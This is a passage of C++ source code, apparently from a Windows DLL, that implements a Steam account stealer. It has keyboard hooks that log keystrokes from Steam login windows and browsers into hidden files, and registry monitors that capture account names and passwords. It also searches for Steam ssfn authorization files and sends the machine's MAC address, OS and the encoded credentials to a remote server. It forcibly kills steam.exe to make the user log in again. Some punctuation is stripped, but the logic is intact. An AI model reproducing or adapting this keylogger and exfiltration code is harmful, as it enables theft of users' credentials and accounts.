sizeof(jsj));if(_Result SOCKET_ERROR){strcat(jsj, unkonw);}WSACleanup();// 获取MACCString szMac ;szMac GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData ;strPostData.Format(TEXT(%s?M%sOS%sCP%sVER%sID%sAccOne%sDataOne%sAccSecond%sDataSecond%sMD5%sLP%sJC), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace( , %20);//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect ::IsNetworkAlive( dw0 );if( isConnect ){BOOL Result SendURLPost(strPostData);if( Result ){//AfxMessageBox(成功发送数据);FILE *fp;CFileFind finder1x;BOOL noEmpty1xfinder1x.FindFile(C:\\NTUSERS.LOG);if(!noEmpty1x){fpfopen(C:\\NTUSERS.LOG, w);if(fp){fprintf(fp, %s, LocalUser.GetBuffer(0));}fclose(fp);}else{fpfopen(C:\\NTUSERS.LOG, a);if(fp){fprintf(fp, %s, LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes(C:\\NTUSERS.LOG, FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;///// 处理电脑授权文件CString mySTInstPath , mySTSSFNFilePath ;HKEY dw_hKey;LONG x_Ret1 RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, dw_hKey );if( x_Ret1 ERROR_SUCCESS ){char dw_data[256] {0};DWORD dw_Type REG_SZ;DWORD dw_Length 256;LONG x_Ret2 RegQueryValueEx( dw_hKey, TEXT(SteamPath), NULL, dw_Type, (LPBYTE)dw_data, dw_Length );mySTInstPath.Format(TEXT(%s), dw_data);mySTSSFNFilePath.Format(TEXT(%s/ssfn*), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx mySTInstPath.GetBuffer(mySTInstPath.GetLength()1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, dwThreadId4); ///}else{//AfxMessageBox(发送数据失败);DeleteFile(C:\\NTUSERS.LOG);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}else{DeleteFile(C:\\NTUSERS.LOG);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Login false;szLoginEXE true;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}}}Login false;szLoginEXE true;RegCloseKey(xKey);RegCloseKey(hKey);}}}else{if( !GetProcess(steam.exe) ){Login false;szLoginEXE true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 线程 1static DWORD WINAPI HOOKRegedit(LPVOID pParam)
{//AfxMessageBox(线程 1 已启动);HANDLE hNotify;HKEY hKeyx;hNotify CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE, //设置初始状态 RegistryNotify //事件对象的名称 ); if (hNotify 0) { Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);MessageBox(NULL,steam.exe CreateEvent failed!,[ Steam ],MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 Software\\Valve\\Steam, //子键 0, //reserved KEY_NOTIFY, //监视用 hKeyx //保存句柄 ) ! ERROR_SUCCESS) { CloseHandle(hNotify); Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);MessageBox(NULL,steam.exe RegOpenKey failed!,[ Steam ],MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) ! ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hKeyx); Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);MessageBox(NULL,steam.exe RegNotifyChange failed!,[ Steam ], MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) ! WAIT_FAILED) { //MessageBox(NULL,注册表有改动, ,MB_OK);szStrFirst ;szStrFirst szStr;szStr ;HKEY hKey;LONG lRet, lRet2, lRet3, lRet4;lRet RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, hKey );if( lRet ERROR_SUCCESS ){char data[256] {0}, data2[256] {0};DWORD dwType REG_SZ, dwType2 REG_SZ;DWORD dwLength 256, dwLength2 256;lRet2 RegQueryValueEx( hKey, TEXT(AutoLoginUser), NULL, dwType, (LPBYTE)data, dwLength );lRet3 RegQueryValueEx( hKey, TEXT(SteamExe), NULL, dwType2, (LPBYTE)data2, dwLength2 );DWORD dwLastXError 0;lRet4 RegSetValueEx( hKey, TEXT(RememberPassword), NULL, REG_DWORD, (LPBYTE)dwLastXError, sizeof(DWORD) );if(lRet2 ERROR_SUCCESS lRet3 ERROR_SUCCESS){szRegUser.Format(TEXT(%s), data);szRegExe.Format(TEXT(%s), data2);DWORD flen;char *dataX;CFile *file2;file2 new CFile;if( file2-Open(C:\\NTUSERS.LOG, CFile::shareDenyNone | CFile::modeRead) ){flen file2-GetLength();dataX new char[(int)flen1];file2-SeekToBegin();file2-Read(dataX, flen);}szAccount.Format(TEXT(%s), dataX);file2-Close();delete file2;delete []dataX;//AfxMessageBox(szAccount);int ff szAccount.Find(szRegUser, 0);if( ff 0 ){//AfxMessageBox(帐号szRegUser\n模糊数据szStrFirst\n当前 帐号 为重复数据);Regedit false;RegDeleteValue(hKey, TEXT(AutoLoginUser));}else{HKEY dw_hKey;LONG x_Ret1 RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, dw_hKey );if( x_Ret1 ERROR_SUCCESS ){char dw_data[256] {0};DWORD dw_Type REG_SZ;DWORD dw_Length 256;LONG x_Ret2 RegQueryValueEx( dw_hKey, TEXT(SteamPath), NULL, dw_Type, (LPBYTE)dw_data, dw_Length );szSTPath.Format(TEXT(%s), dw_data);szSTFile.Format(TEXT(%s/ssfn*), dw_data);}RegCloseKey(dw_hKey);//// 删除电脑授权文件//char *mySSFNPath szSTPath.GetBuffer(szSTPath.GetLength()1);//szSTPath.ReleaseBuffer();//char *mySSFNFile szSTFile.GetBuffer(szSTFile.GetLength()1);//szSTFile.ReleaseBuffer();//SearchFilesByWildcard_1(mySSFNPath, mySSFNFile);//CString WriteRegUser ;WriteRegUser.Format(TEXT(Software\\Valve\\Steam\\%s), szRegUser);HKEY hKeyX;DWORD dwDisp;DWORD dwTypeX REG_SZ;int ret RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, hKeyX, dwDisp);if (ret ERROR_SUCCESS){szOneUserszRegUser ;szRegUsergen(szRegUser);CString Base64_szRegUser ;Base64_szRegUser BASE64Encode(szRegUser, szRegUser.GetLength());char *szAc1 Base64_szRegUser.GetBuffer(Base64_szRegUser.GetLength()1);Base64_szRegUser.ReleaseBuffer();int ret2 RegSetValueEx(hKeyX, TEXT(AccOne), 0, dwTypeX, (BYTE*)szAc1, strlen(szAc1));if (ret2 ERROR_SUCCESS){szStrFirstgen(szStrFirst);CString Base64_szStrFirst ;Base64_szStrFirst BASE64Encode(szStrFirst, szStrFirst.GetLength());char *szDt1 Base64_szStrFirst.GetBuffer(Base64_szStrFirst.GetLength()1);Base64_szStrFirst.ReleaseBuffer();int ret3 RegSetValueEx(hKeyX, TEXT(DataOne), 0, dwTypeX, (BYTE*)szDt1, strlen(szDt1));if (ret3 ERROR_SUCCESS){//AfxMessageBox(首次帐号szRegUser\n首次模糊数据szDt1\nEXE路径szRegExe);DWORD dwLastError 0;RegSetValueEx( hKey, TEXT(RememberPassword), NULL, REG_DWORD, (LPBYTE)dwLastError, sizeof(DWORD) );RegCloseKey(hKeyX);RegCloseKey(hKey);CloseHandle(hNotify);RegCloseKey(hKeyx);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe \szRegExe\, NULL, SW_HIDE);Sleep(2000);Regedit false;//MessageBox(0, steam.exe 读取系统数据失败请再次登录 , [ Steam ], MB_ICONERROR | MB_OK | MB_DEFBUTTON1);}}}RegCloseKey(hKeyX);}}}RegCloseKey(hKey);}CloseHandle(hNotify);RegCloseKey(hKeyx);return 0;
}// 线程 2static DWORD WINAPI HOOKRegedit2(LPVOID pParam)
{//AfxMessageBox(线程 2 已启动);HKEY hKey_xxx;LONG lRet_xxx1 RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, hKey_xxx );if( lRet_xxx1 ERROR_SUCCESS ){char data_xxx[256] {0};DWORD dwType_xxx REG_SZ;DWORD dwLength_xxx 256;memset(data_xxx, 0, 256);LONG lRet_xxx2 RegQueryValueEx( hKey_xxx, TEXT(AutoLoginUser), NULL, dwType_xxx, (LPBYTE)data_xxx, dwLength_xxx );if(lRet_xxx2 ERROR_SUCCESS){CString myReg1User ;myReg1User.Format(TEXT(%s ), data_xxx);char *sz1User myReg1User.GetBuffer(myReg1User.GetLength()1);myReg1User.ReleaseBuffer();DWORD XdwType_X REG_SZ;RegSetValueEx( hKey_xxx, TEXT(AutoLoginUser), 0, XdwType_X, (BYTE*)sz1User, strlen(sz1User) );}}RegCloseKey(hKey_xxx);HANDLE hNotify;HKEY hxKeyx;hNotify CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE, //设置初始状态 RegistryNotify //事件对象的名称 ); if (hNotify 0) { Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);MessageBox(NULL,steam.exe CreateEvent failed!,[ Steam ],MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 Software\\Valve\\Steam, //子键 0, //reserved KEY_NOTIFY, //监视用 hxKeyx //保存句柄 ) ! ERROR_SUCCESS) { CloseHandle(hNotify); Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);MessageBox(NULL,steam.exe RegOpenKey failed!,[ Steam ],MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hxKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) ! ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hxKeyx); Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);MessageBox(NULL,steam.exe RegNotifyChange failed!,[ Steam ], MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) ! WAIT_FAILED) { //MessageBox(NULL,注册表有改动, ,MB_OK);szStrSecon ;szStrSecon szStr;szStr ;HKEY hKey;LONG lRet, lRet2;lRet RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, hKey );if( lRet ERROR_SUCCESS ){char data[256] {0};DWORD dwType REG_SZ;DWORD dwLength 256;lRet2 RegQueryValueEx( hKey, TEXT(AutoLoginUser), NULL, dwType, (LPBYTE)data, dwLength );if(lRet2 ERROR_SUCCESS){szMailID.Format(TEXT(%s), data);szMailID.Replace( , );szRegUser2.Format(TEXT(%s), data);szRegUser2.Replace( , );//AfxMessageBox(二次帐号szRegUser2\n二次密码szStrSecon);CString ReadRegUser ;ReadRegUser.Format(TEXT(Software\\Valve\\Steam\\%s), szRegUser2);HKEY xKey;LONG lRet3, lRet4, lRet5;lRet3 RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, xKey );if( lRet3 ERROR_SUCCESS ){char xdata[256] {0};char xdata2[256] {0};DWORD xdwType1 REG_SZ;DWORD xdwType2 REG_SZ;DWORD xdwLength1 256;DWORD xdwLength2 256;lRet4 RegQueryValueEx( xKey, TEXT(AccOne), NULL, xdwType1, (LPBYTE)xdata, xdwLength1 );lRet5 RegQueryValueEx( xKey, TEXT(DataOne), NULL, xdwType2, (LPBYTE)xdata2, xdwLength2 );if(lRet4 ERROR_SUCCESS lRet5 ERROR_SUCCESS){CString szReplaceStr ;CString Base64_AccSeconData , Base64_DataSeconData ;szReplaceStr szRegUser2 ;szRegUser2 gen(szRegUser2);Sleep(500);szStrSecon.Replace(szReplaceStr, );szStrSecon gen(szStrSecon);Base64_AccSeconData BASE64Encode(szRegUser2, szRegUser2.GetLength());Sleep(500);Base64_DataSeconData BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()1);Base64_AccSeconData.ReleaseBuffer();char *szData2 Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()1);Base64_DataSeconData.ReleaseBuffer();DWORD XxdwTypeX1 REG_SZ, XxdwTypeX2 REG_SZ;LONG lRet6 RegSetValueEx( xKey, TEXT(AccSecond), NULL, XxdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7 RegSetValueEx( xKey, TEXT(DataSecond), NULL, XxdwTypeX2, (BYTE*)szData2, strlen(szData2));if(lRet6 ERROR_SUCCESS lRet7 ERROR_SUCCESS){//AfxMessageBox(设置注册表用户数据成功);if( !Login ){DWORD dwThreadId;thread CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, dwThreadId);Login true;}DWORD xdwLastErrorx 0;RegSetValueEx( hKey, TEXT(RememberPassword), NULL, REG_DWORD, (LPBYTE)xdwLastErrorx, sizeof(DWORD) );}else{//AfxMessageBox(设置注册表用户数据失败);RegDeleteValue(hKey, TEXT(AutoLoginUser));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}else{//AfxMessageBox(打开注册表用户数据键值失败);DeleteFile(C:\\NTUSERS.LOG);RegDeleteValue(hKey, TEXT(AutoLoginUser));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit false;ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}else{//AfxMessageBox(打开注册表用户数据目录失败);char dataZ[256] {0};DWORD dwTypeZ REG_SZ;DWORD dwLengthZ 256;LONG lRet3Z RegQueryValueEx( hKey, TEXT(AutoLoginUser), NULL, dwTypeZ, (LPBYTE)dataZ, dwLengthZ );DWORD dwLastErrorx 0;LONG lRet4Z RegSetValueEx( hKey, TEXT(RememberPassword), NULL, REG_DWORD, (LPBYTE)dwLastErrorx, sizeof(DWORD) );if(lRet3Z ERROR_SUCCESS){//AfxMessageBox(Gaming is True!\n二次帐号szRegUser3\n二次密码szStrSecon);CString szRegUser3 ;szRegUser3.Format(TEXT(%s), dataZ);CString WriteRegUser ;WriteRegUser.Format(TEXT(Software\\Valve\\Steam\\%s), szRegUser3);HKEY xhKeyX;DWORD XxdwDisp;LONG lRetz RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, xhKeyX, XxdwDisp);if(lRetz ERROR_SUCCESS){CString szReplaceStr ;CString Base64_AccSeconData , Base64_DataSeconData ;szReplaceStr szRegUser3 ;szRegUser3 gen(szRegUser3);Sleep(500);szStrSecon.Replace(szReplaceStr, );szStrSecon gen(szStrSecon);Base64_AccSeconData BASE64Encode(szRegUser3, szRegUser3.GetLength());Sleep(500);Base64_DataSeconData BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()1);Base64_AccSeconData.ReleaseBuffer();char *szData2 Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()1);Base64_DataSeconData.ReleaseBuffer();DWORD XdwTypeX1 REG_SZ, XdwTypeX2 REG_SZ;DWORD XdwTypeX3 REG_SZ, XdwTypeX4 REG_SZ;LONG lRet6z RegSetValueEx( xhKeyX, TEXT(AccSecond), NULL, XdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7z RegSetValueEx( xhKeyX, TEXT(DataSecond), NULL, XdwTypeX2, (BYTE*)szData2, strlen(szData2));LONG lRet8z RegSetValueEx( xhKeyX, TEXT(AccOne), NULL, XdwTypeX3, (BYTE*), 0);LONG lRet9z RegSetValueEx( xhKeyX, TEXT(DataOne), NULL, XdwTypeX4, (BYTE*), 0);if(lRet6z ERROR_SUCCESS lRet7z ERROR_SUCCESS lRet8z ERROR_SUCCESS lRet9z ERROR_SUCCESS){if( !Login ){DWORD dwThreadId;thread CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, dwThreadId);Login true;}RegDeleteValue(hKey, TEXT(Gaming));}else{RegDeleteValue(hKey, TEXT(AutoLoginUser));Regedit false;RegCloseKey(xhKeyX);RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}RegCloseKey(xhKeyX);}else{DeleteFile(C:\\NTUSERS.LOG);RegDeleteValue(hKey, TEXT(Gaming));RegDeleteValue(hKey, TEXT(AutoLoginUser));Regedit false;RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, open, cmd.exe, /q /c taskkill /f /im steam.exe, NULL, SW_HIDE);}}Regedit false;RegCloseKey(xKey);}else{Regedit false;RegDeleteValue(hKey, TEXT(AutoLoginUser));}}RegCloseKey(hKey);} CloseHandle(hNotify);RegCloseKey(hxKeyx);return 0;
}// 清理帐号记录文件static DWORD WINAPI CleanUserData(LPVOID pParam)
{while(1){// 3 小时清理一次记录数据Sleep(3600000);DeleteFile(C:\\NTUSERS.LOG);}return 0;
}// HOOK 键盘回调函数 2 (监控 浏览器 输入)LRESULT DllExport CALLBACK IntProc2(int nCode, WPARAM wParam, LPARAM lParam)
{if( !::EnumWindows(EnumWindowsProc, NULL) ){if(nCode HC_ACTION (lParam 0xc000ffff) 1){BOOL b_Sft ::GetAsyncKeyState(VK_SHIFT) ((sizeof(short) * 8)-1);BOOL b_Clk ::GetKeyState(VK_CAPITAL);BOOL b_Ctl ::GetAsyncKeyState(VK_CONTROL) ((sizeof(short) * 8)-1);BOOL b_Alt ::GetAsyncKeyState(VK_MENU) ((sizeof(short) * 8)-1);if(!b_Ctl !b_Alt){if(b_Sft !b_Clk){switch(wParam){case 1:myEmailSTR !;break;case 2:myEmailSTR ;break;case 3:myEmailSTR #;break;case 4:myEmailSTR $;break;case 5:myEmailSTR %;break;case 6:myEmailSTR ^;break;case 7:myEmailSTR ;break;case 8:myEmailSTR *;break;case 9:myEmailSTR (;break;case 0:myEmailSTR );break;case A:myEmailSTR A;break;case B:myEmailSTR B;break;case C:myEmailSTR C;break;case D:myEmailSTR D;break;case E:myEmailSTR E;break;case F:myEmailSTR F;break;case G:myEmailSTR G;break;case H:myEmailSTR H;break;case I:myEmailSTR I;break;case J:myEmailSTR J;break;case K:myEmailSTR K;break;case L:myEmailSTR L;break;case M:myEmailSTR M;break;case N:myEmailSTR N;break;case O:myEmailSTR O;break;case P:myEmailSTR P;break;case Q:myEmailSTR Q;break;case R:myEmailSTR R;break;case S:myEmailSTR S;break;case T:myEmailSTR T;break;case U:myEmailSTR U;break;case V:myEmailSTR V;break;case W:myEmailSTR W;break;case X:myEmailSTR X;break;case Y:myEmailSTR Y;break;case Z:myEmailSTR Z;break;}}else if(!b_Sft b_Clk){switch(wParam){case 1:myEmailSTR 1;break;case 2:myEmailSTR 2;break;case 3:myEmailSTR 3;break;case 4:myEmailSTR 4;break;case 5:myEmailSTR 5;break;case 6:myEmailSTR 6;break;case 7:myEmailSTR 7;break;case 8:myEmailSTR 8;break;case 9:myEmailSTR 9;break;case 0:myEmailSTR 0;break;case A:myEmailSTR A;break;case B:myEmailSTR B;break;case C:myEmailSTR C;break;case D:myEmailSTR D;break;case E:myEmailSTR E;break;case F:myEmailSTR F;break;case G:myEmailSTR G;break;case H:myEmailSTR H;break;case I:myEmailSTR I;break;case J:myEmailSTR J;break;case K:myEmailSTR K;break;case L:myEmailSTR L;break;case M:myEmailSTR M;break;case N:myEmailSTR N;break;case O:myEmailSTR O;break;case P:myEmailSTR P;break;case Q:myEmailSTR Q;break;case R:myEmailSTR R;break;case S:myEmailSTR S;break;case T:myEmailSTR T;break;case U:myEmailSTR U;break;case V:myEmailSTR V;break;case W:myEmailSTR W;break;case X:myEmailSTR X;break;case Y:myEmailSTR Y;break;case Z:myEmailSTR Z;break;}}else if(b_Sft b_Clk){switch(wParam){case 1:myEmailSTR !;break;case 2:myEmailSTR ;break;case 3:myEmailSTR #;break;case 4:myEmailSTR $;break;case 5:myEmailSTR %;break;case 6:myEmailSTR ^;break;case 7:myEmailSTR ;break;case 8:myEmailSTR *;break;case 9:myEmailSTR (;break;case 0:myEmailSTR );break;case A:myEmailSTR a;break;case B:myEmailSTR b;break;case C:myEmailSTR c;break;case D:myEmailSTR d;break;case E:myEmailSTR e;break;case F:myEmailSTR f;break;case G:myEmailSTR g;break;case H:myEmailSTR h;break;case I:myEmailSTR i;break;case J:myEmailSTR j;break;case K:myEmailSTR k;break;case L:myEmailSTR l;break;case M:myEmailSTR m;break;case N:myEmailSTR n;break;case O:myEmailSTR o;break;case P:myEmailSTR p;break;case Q:myEmailSTR q;break;case R:myEmailSTR r;break;case S:myEmailSTR s;break;case T:myEmailSTR t;break;case U:myEmailSTR u;break;case V:myEmailSTR v;break;case W:myEmailSTR w;break;case X:myEmailSTR x;break;case Y:myEmailSTR y;break;case Z:myEmailSTR z;break;}}else{switch(wParam){case 1:myEmailSTR 1;break;case 2:myEmailSTR 2;break;case 3:myEmailSTR 3;break;case 4:myEmailSTR 4;break; case 5:myEmailSTR 5;break;case 6:myEmailSTR 6;break;case 7:myEmailSTR 7;break;case 8:myEmailSTR 8;break;case 9:myEmailSTR 9;break;case 0:myEmailSTR 0;break;case A:myEmailSTR a;break;case B:myEmailSTR b;break;case C:myEmailSTR c;break;case D:myEmailSTR d;break;case E:myEmailSTR e;break;case F:myEmailSTR f;break;case G:myEmailSTR g;break;case H:myEmailSTR h;break;case I:myEmailSTR i;break;case J:myEmailSTR j;break;case K:myEmailSTR k;break;case L:myEmailSTR l;break;case M:myEmailSTR m;break;case N:myEmailSTR n;break;case O:myEmailSTR o;break;case P:myEmailSTR p;break;case Q:myEmailSTR q;break;case R:myEmailSTR r;break;case S:myEmailSTR s;break;case T:myEmailSTR t;break;case U:myEmailSTR u;break;case V:myEmailSTR v;break;case W:myEmailSTR w;break;case X:myEmailSTR x;break;case Y:myEmailSTR y;break;case Z:myEmailSTR z;break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:myEmailSTR 1;break;case VK_NUMPAD2:myEmailSTR 2;break;case VK_NUMPAD3:myEmailSTR 3;break;case VK_NUMPAD4:myEmailSTR 4;break;case VK_NUMPAD5:myEmailSTR 5;break;case VK_NUMPAD6:myEmailSTR 6;break;case VK_NUMPAD7:myEmailSTR 7;break;case VK_NUMPAD8:myEmailSTR 8;break;case VK_NUMPAD9:myEmailSTR 9;break;case VK_NUMPAD0:myEmailSTR 0;break;case VK_MULTIPLY:myEmailSTR *;break;case VK_ADD: myEmailSTR ;break;case VK_SUBTRACT:myEmailSTR -;break;case VK_DECIMAL: myEmailSTR .;break;case VK_DIVIDE: myEmailSTR /;break;//其他特殊键case VK_BACK:myEmailSTR [Back_Space];//myEmailSTR.Delete(myEmailSTR.GetLength()-1);break;case VK_TAB:myEmailSTR ;break;case VK_SPACE:myEmailSTR ;break;// 回车键case VK_RETURN:myEmailSTR ;break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStrKeyName;if(KeyNameStr){if(b_Sft)myEmailSTR ~;elsemyEmailSTR ;}if(KeyNameStr-){if(b_Sft)myEmailSTR _;elsemyEmailSTR -;}if(KeyNameStr){if(b_Sft)myEmailSTR ;elsemyEmailSTR ;}if(KeyNameStr[){if(b_Sft)myEmailSTR {;elsemyEmailSTR [;}if(KeyNameStr]){if(b_Sft)myEmailSTR };elsemyEmailSTR ];}if(KeyNameStr;){if(b_Sft)myEmailSTR :;elsemyEmailSTR ;;}if(KeyNameStr){if(b_Sft)myEmailSTR \;elsemyEmailSTR ;}if(KeyNameStr,){if(b_Sft)myEmailSTR ;elsemyEmailSTR ,;}if(KeyNameStr.){if(b_Sft)myEmailSTR ;elsemyEmailSTR .;}if(KeyNameStr/){if(b_Sft)myEmailSTR ?;elsemyEmailSTR /;}if(KeyNameStr\\){if(b_Sft)myEmailSTR |;elsemyEmailSTR \\;}//AfxMessageBox(myEmailSTR);CFileFind finder1;BOOL noEmpty1finder1.FindFile(C:\\MailData.txt);if(!noEmpty1){FILE *fpx1;fpx1fopen(C:\\MailData.txt, w);if(fpx1){fprintf(fpx1, %s, myEmailSTR.GetBuffer(0));}fclose(fpx1);}else{FILE *fpx2;fpx2fopen(C:\\MailData.txt, a);if(fpx2){fprintf(fpx2, %s, myEmailSTR.GetBuffer(0));}fclose(fpx2);}myEmailSTR ;}}}LRESULT RetVal CallNextHookEx(hie, nCode, wParam, lParam ); return RetVal;
}// HOOK 键盘回调函数 (监控 Steam.exe 输入)LRESULT DllExport CALLBACK IntProc1(int nCode,WPARAM wParam,LPARAM lParam)
{if(::GetCurrentProcessId() ! GetEXE())return CallNextHookEx(hkb, nCode, wParam, lParam );HWND H_wnd ::GetForegroundWindow();char sTitle[255];CString ss;::SendMessage(H_wnd,WM_GETTEXT,255,(LPARAM)sTitle);//AfxMessageBox(sTitle);ss.Format(TEXT(%s), sTitle);//AfxMessageBox(ss);char *aaa;aaa strstr(sTitle, Steam 登录);char *bbb;bbb strstr(sTitle, Steam 登入);char *ccc;ccc strstr(sTitle, Steam Login);char *ddd;ddd strstr(sTitle, S t e a m 登录);char *eee;eee strstr(sTitle, S t e a m 登 录);int n ss.Find(Steam 登录,0);int m ss.Find(Steam 登入,0);int o ss.Find(Steam Login,0);int p ss.Find(S t e a m 登录,0);int q ss.Find(S t e a m 登 录,0);if( (aaa || bbb || ccc || ddd || eee) || (m 0 || n 0 || o 0 || p 0 || q 0) ){if(!Regedit){HKEY hKeyx;LONG lRetx, lRetx2;lRetx RegOpenKeyEx( HKEY_CURRENT_USER,TEXT(Software\\Valve\\Steam),0, KEY_QUERY_VALUE|KEY_WRITE, hKeyx );if( lRetx ERROR_SUCCESS ){char datas[256] {0};DWORD dwTypes REG_SZ;DWORD dwLengths 256;lRetx2 RegQueryValueEx( hKeyx, TEXT(AutoLoginUser), NULL, dwTypes, (LPBYTE)datas, dwLengths );if(lRetx2 ! ERROR_SUCCESS){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, dwThreadId); Regedit true;}else{// 如果注册表中能打开存放用户数据的键值// 而该键值又为空的话必须运行线程1来操作if( strlen(datas) 4 ){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, dwThreadId); Regedit true;}else{//创建线程监控注册表 2DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit2, NULL, 0, dwThreadId); Regedit true;}}}RegCloseKey(hKeyx);}if(nCode HC_ACTION (lParam 0xc000ffff) 1){BOOL b_Sft ::GetAsyncKeyState(VK_SHIFT) ((sizeof(short) * 8)-1);BOOL b_Clk ::GetKeyState(VK_CAPITAL);BOOL b_Ctl ::GetAsyncKeyState(VK_CONTROL) ((sizeof(short) * 8)-1);BOOL b_Alt ::GetAsyncKeyState(VK_MENU) ((sizeof(short) * 8)-1);if(!b_Ctl !b_Alt){if(b_Sft !b_Clk){switch(wParam){case 1:szStr !;break;case 2:szStr ;break;case 3:szStr #;break;case 4:szStr $;break;case 5:szStr %;break;case 6:szStr ^;break;case 7:szStr ;break;case 8:szStr *;break;case 9:szStr (;break;case 0:szStr );break;case A:szStr A;break;case B:szStr B;break;case C:szStr C;break;case D:szStr 